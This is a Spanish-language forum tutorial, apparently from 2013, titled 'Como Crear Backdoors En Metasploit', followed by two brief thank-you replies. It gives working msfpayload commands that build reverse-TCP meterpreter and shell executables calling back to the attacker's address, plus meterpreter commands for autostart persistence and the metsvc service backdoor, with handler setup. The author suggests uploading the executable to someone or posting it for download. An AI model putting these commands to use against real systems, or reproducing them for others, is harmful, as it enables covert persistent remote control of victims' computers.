• ... Sin eventos.....

    • ... Se ruega leer las normas y reglas. Leer aquí

    • Bienvenido..


     
    Calificación:
    • 0 votos - 0 Media
    • 1
    • 2
    • 3
    • 4
    • 5
    Como Crear Backdoors En Metasploit.[Los Tipos]


    Registrados

    Escritor Friki


    *****
    984


    Como Crear Backdoors En Metasploit.[Los Tipos]
    İmage

    İmage

    ¿Que es una backdoor?


    Es un programa, que ayuda al atacante a tener un acceso al pc, constante , o a dejar accesos a otros intrusos , por cualquier cuestión , es algo que deja vulnerado a tu pc al 100%.

    Hoy os enseñare a hacer backdoors con metasploit, los distintos backdoors que hay :-D empecemos...Aclaro una cosa, con cualquier payload de meterpreter puedes hacer backdoor's acá les explicare unos cuantos , pero es para que investiguen ustedes :-D....

    Backdoor Meterpreter.


    Este backdoor, es del meterpreter para el que no sepa que es, es el "troyano" que usa metasploit, digo troyano porque trae unas funciones añadidas, en mi opinión el mas recomendable de los backdoor ... Empecemos se crea de una forma muy sencilla ..... abren la consola y escriben...

    Código PHP:
    sudo msfpayload windows/meterpreter/reverse_tcp LHOST="Ip/No-Ip" LPORT="Puerto" "Ruta donde se guardara/Elnombrequequieras.exe" 

    Bueno , ese seria el típico Backdoors , seria subírselo a alguien o ponerlo para descargar y finiquitado :-D , bueno y ahora te estarás preguntando......como recibo yo la conexión de este backdoor y de cualquiera de los que veremos hoy, con el exploit, que se llama "exploit/multi/handler" con eso recibiremos todas las conexiones de nuestro backdoor, veamos un ejemplo de recibir conexiones....

    İmage

    Lo ven? consiguió una sesión , sencillo no? :-) , bueno este seria uno de los backdoors que hay, expliquemos unos cuantos mas ;-)

    Backdoors Consola.
    Este backdoor, tan simple te da la consola/terminal/prompt bueno cualquier interprete de comandos que allá en el S.O este es sencillo .....


    Código PHP:
    msfpayload windows/shell/reverse_tcp LHOST="Tu ip/noip" LPORT="Puerto" "ruta/elnombrequequieras.exe" 

    y ya esta ahora os enseño una foto de como sería....

    İmage

    Bueno, aquí se ve la shell obtenida! Gran sonrisa ...pasemos a otro...

    Backdoor Persistence


    Este backdoor es persistence, un comando que trae el meterpreter , podemos ver los comandos poniendo "run persistence -h" dentro del meterpreter.....

    İmage

    Hay ven la información sencillo no? Gran sonrisa bueno pues esto se usa para darnos acceso constante a una maquina, o yo tambien la uso para darme acceso a mi mismo , jeje soy malvado xD jaja Gran sonrisa bueno para usar este comando como ven hay en los parametros solamente pondremos..

    Código PHP:
    run  persistence ---p 1234 -"ip" 

    Bueno analizamos un poco, la "-U" es para que cuando el usuario inicie, lo haga también nuestra backdoors , la "-i" es el intervalo de conexión en este caso ninguno , la "-p" el puerto inventado hay pongan el que tengan abierto xD Gran sonrisa , y la "-r" es para la ip/noip a la que se le va a conectar la suya o la de su amigo ..... y les sale algo parecido a esto...

    İmage

    Bueno hay se ve, como lo pone en el registro, la pid ...etc bueno y como vemos si nos fijamos bien usa el backdoor meterpreter (PAYLOAD) del que os hable antes :-D lo pueden modificar , en la ruta del script y cambiarlo por el que quieran como una VNC o algo así .... :-D
    Despues en un handler , y el payload de el primer backdoor.... como el que vimos colocamos los datos en ese caso (el de la foto) pondriamos de LHOST 192.168.1.87 y en el del puerto 4443 , y nos daría la sesión cuando se conectara Gran sonrisa

    Backdoors Metsvc.


    Este es mas fácil que el otro , porque es un servicio que se instala en la pc victima, y con solo poner en meterpreter este comando.....

    Código PHP:
    run metsvc -

    y ya se les instalaría solo , si ponen run metsvc -h , verán que hay muy pocos comando solo ese y 2 mas y uno es para desinstalar el servicio , muy útil , bueno acá unas fotos de como se instala automáticamente ....

    İmage

    Bueno , para interactuar con este, colocan el handler pero de payload ponen :


    Código PHP:
    set PAYLOAD windows/metsvc_bind_tcp 

    y rellenan los datos correspondientes... :-)

    Bueno hasta aquí la mini-clase de los backdoors de metasploit....
    Salu2 y hasta la próxima....no dejen ninguna puerta abierta...

    İmage

    İmage

    İmage

    05-10-2013 01:23 PM
    Buscar Responder
    Churute13



    Invitado


     
    RE: Como Crear Backdoors En Metasploit.[Los Tipos]
    Interesante muy buena info, gracias.


    Sent from my Nexus 7
    05-10-2013 10:42 PM
    Responder


    Super moderadores

    Nacido de nuevo


    ******
    734

    RE: Como Crear Backdoors En Metasploit.[Los Tipos]
    Interesante, muchas gracias.
    06-10-2013 12:07 AM
    Buscar Responder


    Salto de foro:


    Usuario(s) navegando en este tema: 1 invitado(s)

    Acerca ForoNsN - New Softwarez Network

    Somos una comunidad abierta a todo tipo de persona, con ganas de aprender y compartir todo tipo de conocimiento!

    ""El Don más grande que podemos hacer a otros no es compartir con ellos nuestra riqueza, sino hacerles descubrir la propia""

     

    Información